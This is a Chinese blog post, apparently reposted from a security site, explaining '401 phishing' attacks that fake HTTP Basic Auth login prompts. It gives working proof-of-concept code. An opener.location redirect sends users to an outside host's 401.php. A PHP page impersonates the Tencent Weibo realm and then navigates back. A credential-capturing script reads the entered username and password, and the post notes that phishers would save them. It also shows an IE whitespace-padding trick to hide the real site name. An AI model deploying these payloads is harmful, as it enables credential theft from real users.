关注我们
QRcode 邮件联系 QRcode
主页 » 信息安全 » 正文

如何利用401钓鱼方法全解

 feng  647 ℃  0条点评

前段时间401钓鱼很火,大部分呢是通过向网页插入一个401地址的图片进行钓鱼.但这种方法对于chrome和不支持外链图片的站来说,例如:微博.

什么是401?

HTTP 401是一个网页的返回代码,网页打开时有各种各样的返回代码,例如正常打开网页,网站会返回给浏览器一个名为HTTP 200的代码,意思为网站正常打开了,而如果网页找不到,则网站会返回给网站一个HTTP 404的错误代码,意即“找不到网页”。

反向401钓鱼:
反向401的意思是通过opener.location反向控制调用页地址到401钓鱼页面.
1
POC:

opener.location='http://mmme.me/401.php'
close();

401.php:

<?php
header('WWW-Authenticate: Basic realm="t.qq.com[若干空格...]"');
?>
<script>
history.back();//返回到腾讯微博
</script>

PHP中的实现401钓鱼方法

<?php
if(! isset($_SERVER['PHP_AUTH_USER']) || ! isset($_SERVER['PHP_AUTH_PW'])) {   //如果用户没有输入密码
header('WWW-Authenticate: Basic Realm="您必须输入账号密码"');  //设置HTTP头
header("HTTP/1.1 401 Unauthorized");  //返回一个HTTP 401未认证的代码
}  else {
echo "user logined in to sacour.cn as " . $_SERVER['PHP_AUTH_USER'] . " <br/> with password ";                        //已认证用户的信息,钓鱼网站可以将其替换成写入数据库或者本地文件的代码
echo $_SERVER['PHP_AUTH_PW'][0] . str_pad("",strlen($_SERVER['PHP_AUTH_PW']) - 1,"*")."<br/>";
echo "md5 of the password:" . md5($_SERVER['PHP_AUTH_PW']) ;

}
//401 HTTP 认证
?>

缺点:IE不支持.

IE空白符缺陷:
由于IE的401询问框设计错误,导致我们可以在服务器响应的认证提示信息后面追加大量的空白符将后面的默认内容挤掉,达到调用的目的.
POC:

<?php header('WWW-Authenticate: Basic realm="t.qq.com "'); ?>

IE8:

IE9:

from:freebuf.com

本文仅供学习和交流使用,请勿用作非法用途。

本文标签:
wordpress博客给会员头像添加alt标签
201212期乌云wooyun月爆(报)第一期
​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)安全应急响应工具年末大放送(含下载)安全应急响应工具年末大放送(含下载)中国将出台网络安全审查制度中国将出台网络安全审查制度巧进非诚勿扰—飘柔“爱转角”网站后台巧进非诚勿扰—飘柔“爱转角”网站后台

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国际惯例, 沙发拿下 . . .


注册帐号  |  忘记密码